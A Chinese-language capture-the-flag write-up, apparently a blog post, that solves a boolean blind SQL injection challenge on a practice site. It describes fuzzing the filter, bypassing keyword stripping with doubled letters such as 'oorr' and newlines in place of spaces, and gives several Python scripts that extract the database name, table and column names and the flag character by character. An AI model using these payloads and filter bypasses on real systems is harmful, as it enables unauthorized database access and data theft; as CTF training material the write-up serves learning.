这个题其实是个布尔盲注题,怎么说,正常是you are in,报错是you are not in,触发waf是sql injection detected
然后fuzz一下,图我就不贴了,做的时候忘了截下图
结果大概是过滤了and,空格,逗号,union,+
这里有个坑,fuzz的时候or是可以用的,但是尝试id = 1'/**/or/**/'1'='1的时候报you are not in,不应该啊
试了几下,后台好像是匹配到or就会删去,这里用oorr就可以解决了
剩下的,就是布尔盲注了
先爆数据库名长度
import requests
print("start")
str = "You are in"
url = "http://ctf5.shiyanbar.com/web/earnest/index.php "
for i in range(1,30):
key = {'id':"0'oorr(length(database())=%s)oorr'0"%i}
res = requests.post(url,data=key).text
print(i)
if str in res:
print('database length: %s'%i)
break
print("end!")
18个,然后就是爆数据库名
import requests
str = "You are in"
url = "http://ctf5.shiyanbar.com/web/earnest/index.php"
guess = "abcdefghijklmnopqrstuvwxyz0123456789~+=-*/\{}?!:@#$&[]._"
database = ''
print('start')
for i in range(1,19):
for j in guess:
key = {'id':"0'oorr((mid((database())from(%s)foorr(1)))='%s')oorr'0" %(i,j)}
res = requests.post(url,data=key).text
print('............%s......%s.......'%(i,j))
if str in res:
database += j
break
print(database)
print("end!")
表长度
import requests
str = "You are in"
url = "http://ctf5.shiyanbar.com/web/earnest/index.php"
guess = "abcdefghijklmnopqrstuvwxyz0123456789~+=-*/\{}?!:@#$&[]."
i = 1
print("start")
while True:
res = "0'oorr((select(mid(group_concat(table_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.tables)where(table_schema)=database())='')oorr'0" % i
res = res.replace(' ',chr(0x0a))
key = {'id':res}
r = requests.post(url,data=key).text
print(i)
if str in r:
print("length: %s"%i)
break
i+=1
print("end!")
表名(这里是用@分隔开了表名,有两张表)
import requests
str = "You are in"
url = "http://ctf5.shiyanbar.com/web/earnest/index.php"
guess = "abcdefghijklmnopqrstuvwxyz0123456789~+=-*/\{}?!:@#$&[]."
table = ""
print("start")
for i in range(1,12):
for j in guess:
res = "0'oorr((select(mid(group_concat(table_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.tables)where(table_schema)=database())='%s')oorr'0"%(i,j)
res = res.replace(' ', chr(0x0a))
key = {'id':res}
r = requests.post(url,data=key).text
print(i)
if str in r:
table += j
break
print(table)
print("end!")
列宽
import requests
str = "You are in"
url = "http://ctf5.shiyanbar.com/web/earnest/index.php"
guess = "abcdefghijklmnopqrstuvwxyz0123456789~+=-*/\{}?!:@#$&[]."
i = 1
print("start")
while True:
res = "0'oorr((select(mid(group_concat(column_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.columns)where(table_name)='fiag')='')oorr'0"%i
res = res.replace(' ',chr(0x0a))
key = {'id':res}
r = requests.post(url,data=key).text
print(i)
if str in r:
print("length: %s"%i)
break
i += 1
print("end!")
列名
import requests
str = "You are in"
url = "http://ctf5.shiyanbar.com/web/earnest/index.php"
guess = "abcdefghijklmnopqrstuvwxyz0123456789~+=-*/\{}?!:@#$&[]."
column = ""
print("start")
for i in range(1,6):
for j in guess:
res = "0'oorr((select(mid(group_concat(column_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.columns)where(table_name)='fiag')='%s')oorr'0"%(i,j)
res = res.replace(' ',chr(0x0a))
key = {'id':res}
r = requests.post(url,data=key).text
print("......%s.........%s........."%(i,j))
if str in r:
column+=j
break
print(column)
print("end!")
很明显,flag表flag列,dump一下就行了
import requests
str = "You are in"
url = "http://ctf5.shiyanbar.com/web/earnest/index.php"
guess = "abcdefghijklmnopqrstuvwxyz0123456789~+=-*/\{}?!:@#$&[]."
flag = ""
print("start")
for i in range(1,20):
for j in guess:
res = "0'oorr((select(mid((fl$4g)from(%s)foorr(1)))from(fiag))='%s')oorr'0"%(i,j)
res = res.replace(' ',chr(0x0a))
key = {'id':res}
r = requests.post(url,data=key).text
'print("........%s..........%s........"%(i,j))'
if str in r:
flag+=j
print(flag)
break
print(flag)
print("end!")
flag get√
不过这里有个错误,我没有把空格考虑进去,然后那个减号其实是空格2333